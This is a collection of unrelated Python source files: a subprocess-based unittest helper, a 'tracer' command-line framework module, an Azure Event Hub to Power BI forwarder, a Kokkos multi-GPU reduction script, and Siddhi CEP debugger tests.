# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License
#
# A test library to make it easy to run unittest tests that start,
# monitor, and report output from sub-processes. In particular
# it helps with starting processes that listen on random ports.
import unittest
import os, sys, socket, time, re, inspect, errno, threading
from random import randrange
from subprocess import Popen, PIPE, STDOUT
from copy import copy
import platform
from os.path import dirname as dirname
def pick_port():
"""Pick a random port."""
p = randrange(10000, 20000)
return p
class ProcError(Exception):
"""An exception that captures failed process output"""
def __init__(self, proc, what="bad exit status"):
out = proc.out.strip()
if out:
out = "\nvvvvvvvvvvvvvvvv\n%s\n^^^^^^^^^^^^^^^^\n" % out
else:
out = ", no output)"
super(Exception, self, ).__init__(
"%s %s, code=%s%s" % (proc.args, what, proc.returncode, out))
class NotFoundError(ProcError):
pass
class Proc(Popen):
"""A example process that stores its output, optionally run with valgrind."""
if "VALGRIND" in os.environ and os.environ["VALGRIND"]:
env_args = [os.environ["VALGRIND"], "--error-exitcode=42", "--quiet", "--leak-check=full"]
else:
env_args = []
@property
def out(self):
self._out.seek(0)
return self._out.read()
def __init__(self, args, **kwargs):
"""Start an example process"""
args = list(args)
self.args = args
self._out = os.tmpfile()
try:
Popen.__init__(self, self.env_args + self.args, stdout=self._out, stderr=STDOUT, **kwargs)
except OSError, e:
if e.errno == errno.ENOENT:
raise NotFoundError(self, str(e))
raise ProcError(self, str(e))
except Exception, e:
raise ProcError(self, str(e))
def kill(self):
try:
if self.poll() is None:
Popen.kill(self)
except:
pass # Already exited.
return self.out
def wait_out(self, timeout=10, expect=0):
"""Wait for process to exit, return output. Raise ProcError on failure."""
t = threading.Thread(target=self.wait)
t.start()
t.join(timeout)
if self.poll() is None: # Still running
self.kill()
raise ProcError(self, "timeout")
if expect is not None and self.poll() != expect:
raise ProcError(self)
return self.out
# Work-around older python unittest that lacks setUpClass.
if hasattr(unittest.TestCase, 'setUpClass') and hasattr(unittest.TestCase, 'tearDownClass'):
TestCase = unittest.TestCase
else:
class TestCase(unittest.TestCase):
"""
Roughly provides setUpClass and tearDownClass functionality for older python
versions in our test scenarios. If subclasses override setUp or tearDown
they *must* call the superclass.
"""
def setUp(self):
if not hasattr(type(self), '_setup_class_count'):
type(self)._setup_class_count = len(
inspect.getmembers(
type(self),
predicate=lambda(m): inspect.ismethod(m) and m.__name__.startswith('test_')))
type(self).setUpClass()
def tearDown(self):
self.assertTrue(self._setup_class_count > 0)
self._setup_class_count -= 1
if self._setup_class_count == 0:
type(self).tearDownClass()
class ExampleTestCase(TestCase):
"""TestCase that manages started processes"""
def setUp(self):
super(ExampleTestCase, self).setUp()
self.procs = []
def tearDown(self):
for p in self.procs:
p.kill()
super(ExampleTestCase, self).tearDown()
def proc(self, *args, **kwargs):
p = Proc(*args, **kwargs)
self.procs.append(p)
return p
def wait_port(port, timeout=10):
"""Wait up to timeout for port to be connectable."""
if timeout:
deadline = time.time() + timeout
while (timeout is None or time.time() < deadline):
try:
s = socket.create_connection((None, port), timeout) # Works for IPv6 and v4
s.close()
return
except socket.error, e:
if e.errno != errno.ECONNREFUSED: # Only retry on connection refused error.
raise
raise socket.timeout()
class BrokerTestCase(ExampleTestCase):
"""
ExampleTest that starts a broker in setUpClass and kills it in tearDownClass.
Subclass must set `broker_exe` class variable with the name of the broker executable.
"""
@classmethod
def setUpClass(cls):
cls.port = pick_port()
cls.addr = "127.0.0.1:%s/examples" % (cls.port)
cls.broker = None # In case Proc throws, create the attribute.
cls.broker = Proc(cls.broker_exe + ["-a", cls.addr])
try:
wait_port(cls.port)
except Exception, e:
cls.broker.kill()
raise ProcError(cls.broker, "timed out waiting for port")
@classmethod
def tearDownClass(cls):
if cls.broker: cls.broker.kill()
def tearDown(self):
b = type(self).broker
if b and b.poll() != None: # Broker crashed
type(self).setUpClass() # Start another for the next test.
raise ProcError(b, "broker crash")
super(BrokerTestCase, self).tearDown()
if __name__ == "__main__":
unittest.main()
|
cli.py
|
#===============================================================================
# Imports
#===============================================================================
from __future__ import print_function
import os
import re
import sys
import optparse
import textwrap
import importlib
from collections import (
OrderedDict,
)
from textwrap import (
dedent,
)
import tracer
from .config import (
Config,
ConfigObjectAlreadyCreated,
get_config,
_clear_config_if_already_created,
)
from .command import (
Command,
CommandError,
ClashingCommandNames,
)
from .util import (
iterable,
ensure_unique,
add_linesep_if_missing,
prepend_error_if_missing,
Dict,
Options,
Constant,
DecayDict,
)
from .invariant import (
Invariant,
)
#===============================================================================
# Globals
#===============================================================================
INTERACTIVE = False
#===============================================================================
# Constants
#===============================================================================
class _ArgumentType(Constant):
Optional = 1
Mandatory = 2
ArgumentType = _ArgumentType()
#===============================================================================
# CommandLine Class
#===============================================================================
class CommandLine:
_conf_ = True
_argc_ = 0
_optc_ = 0
_vargc_ = None
_usage_ = None
_quiet_ = None
_verbose_ = None
_command_ = None
_shortname_ = None
_description_ = None
def __init__(self, program_name, command_class, config_class):
self.mandatory_opts = OrderedDict()
self.config_class = config_class
self.program_name = program_name
self.command_class = command_class
self.command_classname = command_class.__name__
self.command = self.command_class(sys.stdin, sys.stdout, sys.stderr)
self.name = self.command.name
self.shortname = self.command.shortname
self.prog = '%s %s' % (self.program_name, self.name)
self.parser = None
self.conf = None
def add_option(self, *args, **kwds):
if kwds.get('mandatory'):
self.mandatory_opts[args] = kwds['dest']
del kwds['mandatory']
self.parser.add_option(*args, **kwds)
def remove_option(self, *args):
self.parser.remove_option(args[0])
if args in self._mandatory_opts:
del self._mandatory_opts[args]
def usage_error(self, msg):
self.parser.print_help()
sys.stderr.write("\nerror: %s\n" % msg)
self.parser.exit(status=1)
def _add_parser_options(self):
cmd = self.command
if not hasattr(cmd, '_invariants'):
return
invariants = cmd._invariants
for (_, name) in cmd._invariant_order:
i = invariants[name]
args = []
if i._opt_short:
args.append('-' + i._opt_short)
if i._opt_long:
args.append('--' + i._opt_long)
fields = (
'help',
'action',
'default',
'metavar',
'mandatory',
)
k = Dict()
k.dest = name
for f in fields:
v = getattr(i, '_' + f)
if v:
k[f] = v if not callable(v) else v()
self.add_option(*args, **k)
def run(self, args):
k = Dict()
k.prog = self.prog
if self._usage_:
k.usage = self._usage_
if self._description_:
k.description = self._description_
else:
docstring = self.command.__doc__
if docstring:
k.description = textwrap.dedent(docstring)
self.parser = optparse.OptionParser(**k)
if self.command._verbose_:
assert self.command._quiet_ is None
self.parser.add_option(
'-v', '--verbose',
dest='verbose',
action='store_true',
default=False,
help="run in verbose mode [default: %default]"
)
if self.command._quiet_:
assert self.command._verbose_ is None
self.parser.add_option(
'-q', '--quiet',
dest='quiet',
action='store_true',
default=False,
help="run in quiet mode [default: %default]"
)
if self.command._conf_:
self.parser.add_option(
'-c', '--conf',
metavar='FILE',
help="use alternate configuration file FILE"
)
self._add_parser_options()
(opts, self.args) = self.parser.parse_args(args)
# Ignore variable argument commands altogether.
# xxx: todo
if 0 and self._vargc_ is not True:
arglen = len(self.args)
if arglen == 0 and self._argc_ != 0:
self.parser.print_help()
self.parser.exit(status=1)
if len(self.args) != self._argc_ and self._argc_ != 0:
self.usage_error("invalid number of arguments")
self.options = Options(opts.__dict__)
if self.mandatory_opts:
d = opts.__dict__
for (opt, name) in self.mandatory_opts.items():
if d.get(name) is None:
self.usage_error("%s is mandatory" % '/'.join(opt))
#self._pre_process_parser_results()
f = None
if self._conf_:
f = self.options.conf
if f and not os.path.exists(f):
self.usage_error("configuration file '%s' does not exist" % f)
try:
self.conf = self.config_class(options=self.options)
self.conf.load(filename=f)
except ConfigObjectAlreadyCreated:
self.conf = get_config()
self.command.interactive = INTERACTIVE
self.command.conf = self.conf
self.command.args = self.args
self.command.options = self.options
self.command.start()
#===============================================================================
# CLI Class
#===============================================================================
class CLI(object):
"""
The CLI class glues together Command and CommandLine instances.
"""
__unknown_subcommand__ = "Unknown subcommand '%s'"
__usage__ = "Type '%prog help' for usage."
__help__ = """\
Type '%prog <subcommand> help' for help on a specific subcommand.
Available subcommands:"""
def __init__(self, *args, **kwds):
k = DecayDict(**kwds)
self.args = list(args) if args else []
self.program_name = k.program_name
self.module_names = k.module_names or []
self.args_queue = k.get('args_queue', None)
self.feedback_queue = k.get('feedback_queue', None)
k.assert_empty(self)
self.returncode = 0
self.commandline = None
ensure_unique(self.module_names)
self.modules = Dict()
self.modules.config = OrderedDict()
self.modules.commands = OrderedDict()
self._help = self.__help__
self._commands_by_name = dict()
self._commands_by_shortname = dict()
self._import_command_and_config_modules()
self._load_commands()
if not self.args_queue:
if self.args:
self.run()
else:
self.help()
def run(self):
if not self.args_queue:
self._process_commandline()
return
from Queue import Empty
cmdlines = {}
while True:
try:
args = self.args_queue.get_nowait()
except Empty:
break
cmdline = args.pop(0).lower()
if cmdline not in cmdlines:
cmdlines[cmdline] = self._find_commandline(cmdline)
cl = cmdlines[cmdline]
cl.run(args)
self.args_queue.task_done()
def _import_command_and_config_modules(self):
for namespace in self.module_names:
for suffix in ('commands', 'config'):
name = '.'.join((namespace, suffix))
store = getattr(self.modules, suffix)
store[namespace] = importlib.import_module(name)
def _find_command_subclasses(self):
seen = dict()
pattern = re.compile('^class ([^\s]+)\(.*', re.M)
subclasses = list()
for (namespace, module) in self.modules.commands.items():
path = module.__file__
if path[-1] == 'c':
path = path[:-1]
with open(path, 'r') as f:
matches = pattern.findall(f.read())
for name in [ n for n in matches if n[0] != '_' ]:
attr = getattr(module, name)
if attr == Command or not issubclass(attr, Command):
continue
if name in seen:
args = (name, seen[name], namespace)
raise ClashingCommandNames(*args)
seen[name] = namespace
subclasses.append((namespace, name, attr))
return subclasses
def _load_commands(self):
subclasses = [
sc for sc in sorted(self._find_command_subclasses())
]
for (namespace, command_name, command_class) in subclasses:
if command_name in self._commands_by_name:
continue
config_module = self.modules.config[namespace]
config_class = getattr(config_module, 'Config')
cl = CommandLine(self.program_name, command_class, config_class)
helpstr = self._helpstr(cl.name)
if cl.shortname:
if cl.shortname in self._commands_by_shortname:
continue
self._commands_by_shortname[cl.shortname] = cl
if '[n]@' in helpstr:
prefix = '[n]@'
else:
prefix = ''
helpstr += ' (%s%s)' % (prefix, cl.shortname)
self._help += helpstr
self._commands_by_name[cl.name] = cl
# Add a fake version command so that it'll appear in the list of
# available commands. (We intercept version requests during
# _process_command(); there's no actual command for it.)
self._help += self._helpstr('version')
self._commands_by_name['version'] = None
def _helpstr(self, name):
i = 12
if name.startswith('multiprocess'):
prefix = '[n]@'
name = prefix + name
i -= len(prefix)
return os.linesep + (' ' * i) + name
def _load_commandlines(self):
subclasses = [
sc for sc in sorted(self._find_commandline_subclasses())
]
for (scname, subclass) in subclasses:
if scname in self._commands_by_name:
continue
try:
cl = subclass(self.program_name)
except TypeError as e:
# Skip abstract base classes (e.g. 'AdminCommandLine').
if e.args[0].startswith("Can't instantiate abstract class"):
continue
raise
helpstr = self._helpstr(cl.name)
if cl.shortname:
if cl.shortname in self._commands_by_shortname:
continue
self._commands_by_shortname[cl.shortname] = cl
helpstr += ' (%s)' % cl.shortname
self._help += helpstr
self._commands_by_name[cl.name] = cl
# Add a fake version command so that it'll appear in the list of
# available subcommands. It doesn't matter if it's None as we
# intercept 'version', '-v' and '--version' in the
# _process_commandline method before doing the normal command
# lookup.
self._help += self._helpstr('version')
self._commands_by_name['version'] = None
def _find_commandline(self, cmdline):
return self._commands_by_name.get(cmdline,
self._commands_by_shortname.get(cmdline))
def _process_commandline(self):
args = self.args
cmdline = args.pop(0).lower()
if cmdline and cmdline[0] != '_':
if '-' not in cmdline and hasattr(self, cmdline):
getattr(self, cmdline)(args)
return self._exit(0)
elif cmdline in ('-v', '-V', '--version'):
self.version()
else:
cl = self.commandline = self._find_commandline(cmdline)
if cl:
try:
cl.run(args)
return self._exit(0)
except (CommandError, Invariant) as err:
self._commandline_error(cl, str(err))
if not self.returncode:
self._error(
os.linesep.join((
self.__unknown_subcommand__ % cmdline,
self.__usage__,
))
)
def _exit(self, code):
self.returncode = code
def _commandline_error(self, cl, msg):
args = (self.program_name, cl.name, msg)
msg = '%s %s failed: %s' % args
sys.stderr.write(prepend_error_if_missing(msg))
return self._exit(1)
def _error(self, msg):
sys.stderr.write(
add_linesep_if_missing(
dedent(msg).replace(
'%prog', self.program_name
)
)
)
return self._exit(1)
def usage(self, args=None):
self._error(self.__usage__)
def version(self, args=None):
sys.stdout.write(add_linesep_if_missing(tracer.__version__))
return self._exit(0)
def help(self, args=None):
if args:
l = [ args.pop(0), '-h' ]
if args:
l += args
self._process_commandline(l)
else:
self._error(self._help + os.linesep)
#===============================================================================
# Main
#===============================================================================
def extract_command_args_and_kwds(*args_):
args = [ a for a in args_ ]
kwds = {
'program_name': args.pop(0),
'module_names': [ m for m in args.pop(0).split(',') ] if args else None
}
return (args, kwds)
def run(*args_):
global INTERACTIVE
if len(args_) == 1 and isinstance(args_[0], str):
args_ = args_[0].split(' ')
INTERACTIVE = True
(args, kwds) = extract_command_args_and_kwds(*args_)
_clear_config_if_already_created()
cli = CLI(*args, **kwds)
if INTERACTIVE:
return cli.commandline.command
else:
return cli
def run_mp(**kwds):
cli = CLI(**kwds)
cli.run()
if __name__ == '__main__':
# Intended invocation:
# python -m tracer.cli <program_name> <library_name> \
# <command_name> [arg1 arg2 argN]
# Multiprocessor support: prefix command_name with @. The @ will be
# removed, the command will be run, and then the command.result field
# will be expected to be populated with a list of argument lists that
# will be pushed onto a multiprocessing joinable queue.
is_mp = False
args = sys.argv[1:]
if len(args) <= 2:
cli = run(*args)
sys.exit(cli.returncode)
command = args[2]
if '@' in command:
is_mp = True
ix = command.find('@')
parallelism_hint = int(command[:ix] or 0)
args[2] = command[ix+1:]
cli = run(*args)
if not is_mp or cli.returncode:
sys.exit(cli.returncode)
command = cli.commandline.command
results = command.results
if not results:
err("parallel command did not produce any results\n")
sys.exit(1)
from multiprocessing import (
cpu_count,
Process,
JoinableQueue,
)
args_queue = JoinableQueue(len(results))
for args in results:
args_queue.put(args[2:])
# Grab the program_name and module_names from the first result args.
(_, kwds) = extract_command_args_and_kwds(*results[0])
kwds['args_queue'] = args_queue
nprocs = cpu_count()
if parallelism_hint:
if parallelism_hint > nprocs:
fmt = "warning: parallelism hint exceeds ncpus (%d vs %d)\n"
msg = fmt % (parallelism_hint, nprocs)
sys.stderr.write(msg)
nprocs = parallelism_hint
procs = []
for i in range(0, nprocs):
p = Process(target=run_mp, kwargs=kwds)
procs.append(p)
p.start()
sys.stdout.write("started %d processes\n" % len(procs))
args_queue.join()
def main(program_name=None, library_name=None):
if not program_name:
program_name = 'tracer'
if not library_name:
library_name = 'tracer'
args = [ program_name, library_name ] + sys.argv[1:]
cli = run(*args)
sys.exit(cli.returncode)
# vim:set ts=8 sw=4 sts=4 tw=78 et:
|
run.py
|
# -*- coding: utf-8 -*-
from azure.storage.blob import BlockBlobService
import UtilityHelper
import asyncio
import requests, datetime
import os, json, threading
import multiprocessing
from azure.eventprocessorhost import (
AbstractEventProcessor,
AzureStorageCheckpointLeaseManager,
EventHubConfig,
EventProcessorHost,
EPHOptions)
_httpRequest = requests.session()
_headers = {
'Content-Type': 'application/json',
}
def Send2PowerBI(jsonData):
_httpRequest.post(jsonData['pushURL'], headers=_headers, params=None, json=jsonData)
print('send:' + str(jsonData))
class PowerBIHelper:
_dataQueue = []
def __init__(self):
self.httpRequest = requests.session()
def feedIn(self, jsonData):
try:
PowerBIHelper._dataQueue.append(jsonData)
except Exception as ex:
print(str(ex))
def start(self):
print('PowerBIHelper Instant started')
threading.Thread(target=self.emit, daemon=True, args=()).start()
def emit(self):
while True:
if (len(PowerBIHelper._dataQueue) > 0):
postData = PowerBIHelper._dataQueue.pop(0)
p = multiprocessing.Process(target=Send2PowerBI, args=(postData,))
p.start()
print('PowerBI queue length:' + str(len(PowerBIHelper._dataQueue)))
class EventProcessor(AbstractEventProcessor):
def __init__(self, params=None):
super().__init__(params)
# Initialize Event Processor Host
async def open_async(self, context):
print("Connection established {}".format(context.partition_id))
# Processor Host indicate the event processor is being stopped.
async def close_async(self, context, reason):
print("Connection closed (reason {}, id {}, offset {}, sq_number {})".format(
reason,
context.partition_id,
context.offset,
context.sequence_number))
# Processor Host received a batch of events.
# We retrieve Tenant Id from application properties
# and, feed in message to Web API of SignalR
async def process_events_async(self, context, messages):
for eventData in messages:
deviceId = eventData._annotations[b'iothub-connection-device-id'].decode("utf-8")
try:
pushURL = _deviceMap[deviceId]
messageJSON = json.loads(str(eventData.message))
_pushData[deviceId]['pushURL'] = pushURL
_pushData[deviceId]['SourceTimestamp'] = messageJSON['timestamp']
for tag in messageJSON['tags']:
if tag['Name'] == 'TEMP':
#pushData['TEMP'] = tag['Value'] * 1.8 + 32
_pushData[deviceId]['TEMP'] = tag['Value']
elif tag['Name'] == 'IRR':
_pushData[deviceId]['IRR'] = tag['Value']
elif tag['Name'] == 'INV':
_pushData[deviceId]['INV'] = tag['Value']
powerBI.feedIn(_pushData[deviceId])
except:
print('Exception on handle deviceId: ' + deviceId)
await context.checkpoint_async()
# Processor Host indicate error happen, it will try to continuing to pump message. No action is required.
async def process_error_async(self, context, error):
print("Event Processor Error {!r}".format(error))
# Endless Loop
async def noneStop(host):
while True:
await asyncio.sleep(600)
class HotdataReceiverMain:
def __init__(self):
# Load Configuration from file
try:
configFile = os.path.join(os.path.dirname((os.path.dirname(os.path.abspath(__file__)))), 'config.json')
with open(configFile) as json_file:
config = json.load(json_file)
nameValue = UtilityHelper.connectStringToDictionary(config['azureResource']['StorageAccountConnectionString'])
self.storageAccountName = nameValue['AccountName']
self.storageAccountKey = nameValue['AccountKey']
self.storageEndpointSuffix = nameValue['EndpointSuffix']
self.storageContainer = config['azureResource']['StorageContainerPowerBI']
self.eventHubConnectionString = config['azureResource']['IoT-EventHubConnectionString']
self.eventHubName = config['azureResource']['IoT-EventHubName']
self.consumerGroup = config['azureResource']['IoT-ConsumerGroupPowerBI']
self.webAppURL = config['appSetting']['webAppURL']
if (not self.webAppURL.endswith('/')):
self.webAppURL = self.webAppURL + '/'
self.rtMessageRoomId = config['appSetting']['rtMessageRoomId']
except:
raise
return
# Event Hub Configuration
def loadEventHubConfig(self):
try:
nameValue = UtilityHelper.connectStringToDictionary(self.eventHubConnectionString)
nameSpace = UtilityHelper.getSubstring(nameValue['Endpoint'], '//', '.')
user = nameValue['SharedAccessKeyName']
key = nameValue['SharedAccessKey']
ehConfig = EventHubConfig(nameSpace, self.eventHubName, user, key, consumer_group=self.consumerGroup)
except:
raise
return ehConfig
# CheckPoint Store Configuration
def loadStorageManager(self):
try:
storageManager = AzureStorageCheckpointLeaseManager(
storage_account_name=self.storageAccountName,
storage_account_key=self.storageAccountKey,
lease_container_name=self.storageContainer)
except:
raise
return storageManager
# Event Hub Optional Configuration
def loadEventHostOptions(self):
ehOptions = EPHOptions()
ehOptions.max_batch_size = 10
ehOptions.receive_timeout = 300
ehOptions.keep_alive_interval = 290 # We don't want receiver get timeout, so send a ping before it time out.
ehOptions.release_pump_on_timeout = False
ehOptions.initial_offset_provider = '@latest' # Always get message from latest
ehOptions.debug_trace = False
return ehOptions
# Clear Storage Old Data
def clearStorageOldData(self):
blobService = BlockBlobService(
account_name=self.storageAccountName,
account_key=self.storageAccountKey,
endpoint_suffix=self.storageEndpointSuffix
)
try:
blobs = blobService.list_blobs(self.storageContainer)
for blob in blobs:
blobService.delete_blob(self.storageContainer, blob.name)
print('delete blob : ' + blob.name)
except:
print('blob was locked. Re-try after 30 seconds.')
time.sleep(30)
self.clearStorageOldData()
def run(self):
try:
print('Loading EventHub Config...')
ehConfig = self.loadEventHubConfig()
print('Loading Storage Manager...')
storageManager = self.loadStorageManager()
print('Clear Storage Old Data...')
self.clearStorageOldData()
print('Loading Event Host Options...')
ehOptions = self.loadEventHostOptions()
except Exception as ex:
print('Exception on loading config. Error:' + str(ex))
return
try:
# Event loop and host
print('Start Event Processor Host Loop...')
loop = asyncio.get_event_loop()
host = EventProcessorHost(
EventProcessor,
ehConfig,
storageManager,
ep_params=["param1","param2"],
eph_options=ehOptions,
loop=loop)
tasks = asyncio.gather(
host.open_async(),
noneStop(host))
loop.run_until_complete(tasks)
except Exception as ex:
# Canceling pending tasks and stopping the loop
print('Exception, leave loop. Error:' + str(ex))
for task in asyncio.Task.all_tasks():
task.cancel()
loop.run_forever()
tasks.exception()
finally:
loop.stop()
# 程式開始
# Load Device-> PushRUL Mapping
_deviceMap = dict()
_pushData = dict()
with open('deviceMapping.json') as json_file:
deviceList = json.load(json_file)
for device in deviceList:
_deviceMap[device['deviceId']] = device['pushURL']
deviceData = dict()
deviceData['TEMP_Min'] = 50
deviceData['TEMP_Max'] = 125
deviceData['IRR_Min'] = 0
deviceData['IRR_Max'] = 100
deviceData['INV_Min'] = 0
deviceData['INV_Max'] = 10
_pushData[device['deviceId']] = deviceData
# Start Power BI Thread
powerBI = PowerBIHelper()
powerBI.start()
# Start Main Program Process
main = HotdataReceiverMain()
main.run()
|
multithread_kokkos.py
|
from threading import Thread
from parla.multiload import multiload_contexts
import time
if __name__ == '__main__':
m = 2
n_local = 1000000000
N = m * n_local
#Load and configure
#Sequential to avoid numpy bug
t = time.time()
for i in range(m):
multiload_contexts[i].load_stub_library("cuda")
multiload_contexts[i].load_stub_library("cudart")
with multiload_contexts[i]:
import numpy as np
import kokkos.gpu.core as kokkos
kokkos.start(i)
t = time.time() - t
print("Initialize time: ", t, flush=True)
t = time.time()
array = np.arange(1, N+1, dtype='float64')
result = np.zeros(m, dtype='float64')
t = time.time() - t
print("Initilize array time: ", t, flush=True)
def reduction(array, i):
print("ID: ", i, flush=True)
global n_local
start = (i)*n_local
end = (i+1)*n_local
with multiload_contexts[i]:
result[i] = kokkos.reduction(array[start:end], i)
print("Finish: ", i, flush=True)
t = time.time()
threads = []
for i in range(m):
y = Thread(target=reduction, args=(array, i))
threads.append(y)
t = time.time() - t
print("Initialize threads time: ", t, flush=True)
t = time.time()
for i in range(m):
threads[i].start()
for i in range(m):
threads[i].join()
t = time.time() - t
print("Reduction Time: ", t, flush=True)
t = time.time()
s = 0.0
for i in range(m):
s += result[i]
result = s
#result = np.sum(result)
t = time.time() - t
print("Sum Time: ", t, flush=True)
print("Final Result: ", result, (N*(N+1))/2, flush=True)
t = time.time()
for i in range(m):
with multiload_contexts[i]:
kokkos.end()
t = time.time() - t
print("Finalize Time: ", t, flush=True)
|
TestDebugger.py
|
#!/usr/bin/env python2.7
import unittest
import logging
logging.basicConfig(level=logging.INFO)
from datetime import datetime
import time
from time import sleep
from unittest.case import TestCase
from SiddhiCEP4.core.SiddhiManager import SiddhiManager
from SiddhiCEP4.core.debugger.SiddhiDebugger import SiddhiDebugger
from SiddhiCEP4.core.debugger.SiddhiDebuggerCallback import SiddhiDebuggerCallback
from SiddhiCEP4.core.stream.output.StreamCallback import StreamCallback
from Tests.Util.AtomicInt import AtomicInt
import threading
class TestDebugger(TestCase):
def setUp(self):
self.inEventCount = AtomicInt(0)
self.debugEventCount = AtomicInt(0)
def getCount(self, event):
count = 0
while event != None:
count += 1
event = event.getNext()
return count
def test_Debugger1(self):
logging.info("Siddi Debugger Test 1: Test next traversal in a simple query")
siddhiManager = SiddhiManager()
cseEventStream = "@config(async = 'true') define stream cseEventStream (symbol string, price float, volume int);"
query = "@info(name = 'query 1') from cseEventStream select symbol, price, volume insert into OutputStream; "
siddhiAppRuntime = siddhiManager.createSiddhiAppRuntime(cseEventStream + query)
_self_shaddow = self
class StreamCallbackImpl(StreamCallback):
def receive(self, events):
_self_shaddow.inEventCount.addAndGet(len(events))
siddhiAppRuntime.addCallback("OutputStream", StreamCallbackImpl()) #Causes GC Error
inputHandler = siddhiAppRuntime.getInputHandler("cseEventStream")
siddhiDebugger = siddhiAppRuntime.debug()
siddhiDebugger.acquireBreakPoint("query 1", SiddhiDebugger.QueryTerminal.IN)
class SiddhiDebuggerCallbackImpl(SiddhiDebuggerCallback):
def debugEvent(self, event, queryName,queryTerminal, debugger):
logging.info("Query: " + queryName + ":" + queryTerminal.name)
logging.info(event)
count = _self_shaddow.debugEventCount.addAndGet(_self_shaddow.getCount(event))
if count == 1:
_self_shaddow.assertEquals("query 1IN", queryName + queryTerminal.name,"Incorrect break point")
_self_shaddow.assertListEqual(["WSO2", 50.0, 60],event.getOutputData(),"Incorrect debug event received at IN")
elif count == 2:
_self_shaddow.assertEqual("query 1OUT", queryName + queryTerminal.name, "Incorrect break point")
_self_shaddow.assertListEqual(["WSO2", 50.0, 60],event.getOutputData(),"Incorrect debug event received at OUT")
elif count == 3:
_self_shaddow.assertEqual("query 1IN", queryName + queryTerminal.name, "Incorrect break point")
_self_shaddow.assertListEqual(["WSO2", 70.0, 40], event.getOutputData(),"Incorrect debug event received at IN")
elif count == 4:
_self_shaddow.assertEquals("query 1OUT", queryName + queryTerminal.name, "Incorrect break point")
_self_shaddow.assertListEqual(["WSO2", 70.0, 40],event.getOutputData(), "Incorrect debug event received at OUT")
debugger.next()
siddhiDebugger.setDebuggerCallback(SiddhiDebuggerCallbackImpl())
inputHandler.send(["WSO2", 50.0, 60])
inputHandler.send(["WSO2", 70.0, 40])
sleep(0.1)
self.assertEquals(2, _self_shaddow.inEventCount.get(), "Invalid number of output events")
self.assertEquals(4, _self_shaddow.debugEventCount.get(),"Invalid number of debug events")
siddhiAppRuntime.shutdown()
siddhiManager.shutdown()
def test_debugger2(self):
logging.info("Siddi Debugger Test 2: Test next traversal in a query with length batch window")
siddhiManager = SiddhiManager()
cseEventStream = "@config(async = 'true') define stream cseEventStream (symbol string, price float, volume int);"
query = "@info(name = 'query1') from cseEventStream#window.lengthBatch(3) select symbol, price, volume insert into OutputStream; "
siddhiAppRuntime = siddhiManager.createSiddhiAppRuntime(cseEventStream + query)
_self_shaddow = self
class OutputStreamCallbackImpl(StreamCallback):
def receive(self, events):
_self_shaddow.inEventCount.addAndGet(len(events))
siddhiAppRuntime.addCallback("OutputStream", OutputStreamCallbackImpl())
inputHandler = siddhiAppRuntime.getInputHandler("cseEventStream")
siddhiDebugger = siddhiAppRuntime.debug()
siddhiDebugger.acquireBreakPoint("query1", SiddhiDebugger.QueryTerminal.IN)
class SiddhiDebuggerCallbackImpl(SiddhiDebuggerCallback):
def debugEvent(self, event, queryName, queryTerminal, debugger):
logging.info("Query: " + queryName + ":" + queryTerminal.name)
logging.info(event)
count = _self_shaddow.debugEventCount.addAndGet(_self_shaddow.getCount(event))
if count == 1:
_self_shaddow.assertEquals("query1IN", queryName + queryTerminal.name,"Incorrect break point")
_self_shaddow.assertListEqual(["WSO2", 50.0, 60], event.getOutputData(),"Incorrect debug event received at IN")
elif count == 2:
_self_shaddow.assertEquals("query1IN", queryName + queryTerminal.name,"Incorrect break point")
_self_shaddow.assertListEqual(["WSO2", 70.0, 40],event.getOutputData(),"Incorrect debug event received at IN")
elif count == 3:
_self_shaddow.assertEquals("query1IN", queryName + queryTerminal.name, "Incorrect break point")
_self_shaddow.assertListEqual(["WSO2", 60.0, 50], event.getOutputData(),"Incorrect debug event received at IN")
elif count == 4:
_self_shaddow.assertEquals("query1OUT", queryName + queryTerminal.name, "Incorrect break point")
_self_shaddow.assertEquals(3, _self_shaddow.getCount(event),"Incorrect number of events received")
debugger.next()
siddhiDebugger.setDebuggerCallback(SiddhiDebuggerCallbackImpl())
inputHandler.send(["WSO2", 50.0, 60])
inputHandler.send(["WSO2", 70.0, 40])
inputHandler.send(["WSO2", 60.0, 50])
sleep(0.1)
self.assertEquals(3, self.inEventCount.get(),"Invalid number of output events")
self.assertEquals(6, self.debugEventCount.get(),"Invalid number of debug events")
siddhiAppRuntime.shutdown()
siddhiManager.shutdown()
def test_debugger3(self):
logging.info("Siddi Debugger Test 3: Test next traversal in a query with time batch window")
siddhiManager = SiddhiManager()
cseEventStream = "define stream cseEventStream (symbol string, price float, volume int);"
query = "@info(name = 'query1')" + "from cseEventStream#window.timeBatch(3 sec) " + "select symbol, price, volume " + "insert into OutputStream; "
siddhiAppRuntime = siddhiManager.createSiddhiAppRuntime(cseEventStream + query)
_self_shaddow = self
class OutputStreamCallbackImpl(StreamCallback):
def receive(self, events):
_self_shaddow.inEventCount.addAndGet(len(events))
siddhiAppRuntime.addCallback("OutputStream", OutputStreamCallbackImpl())
inputHandler = siddhiAppRuntime.getInputHandler("cseEventStream")
siddhiDebugger = siddhiAppRuntime.debug()
siddhiDebugger.acquireBreakPoint("query1", SiddhiDebugger.QueryTerminal.IN)
current_milli_time = lambda: int(round(time.time() * 1000))
class SiddhiDebuggerCallbackImpl(SiddhiDebuggerCallback):
def debugEvent(self, event, queryName, queryTerminal, debugger):
logging.info("Query: " + queryName + "\t" + str(current_milli_time()))
logging.info(event)
count = _self_shaddow.debugEventCount.addAndGet(_self_shaddow.getCount(event))
if count == 1:
_self_shaddow.assertEquals("query1IN", queryName + queryTerminal.name,"Incorrect break point")
_self_shaddow.assertListEqual(["WSO2", 50.0, 60], event.getOutputData(),"Incorrect debug event received at IN")
elif count == 2:
_self_shaddow.assertEquals("query1IN", queryName + queryTerminal.name,"Incorrect break point")
_self_shaddow.assertListEqual(["WSO2", 70.0, 40], event.getOutputData(),"Incorrect debug event received at IN")
elif count == 3:
_self_shaddow.assertEquals("query1IN", queryName + queryTerminal.name, "Incorrect break point")
_self_shaddow.assertListEqual(["WSO2", 60.0, 50], event.getOutputData(),"Incorrect debug event received at IN")
#next call will not reach OUT since there is a window
debugger.next()
siddhiDebugger.setDebuggerCallback(SiddhiDebuggerCallbackImpl())
inputHandler.send(["WSO2", 50.0, 60])
inputHandler.send(["WSO2", 70.0, 40])
inputHandler.send(["WSO2", 60.0, 50])
sleep(4)
self.assertEquals(3, self.inEventCount.get(),"Invalid number of output events")
self.assertEquals(3, self.debugEventCount.get(),"Invalid number of debug events")
siddhiAppRuntime.shutdown()
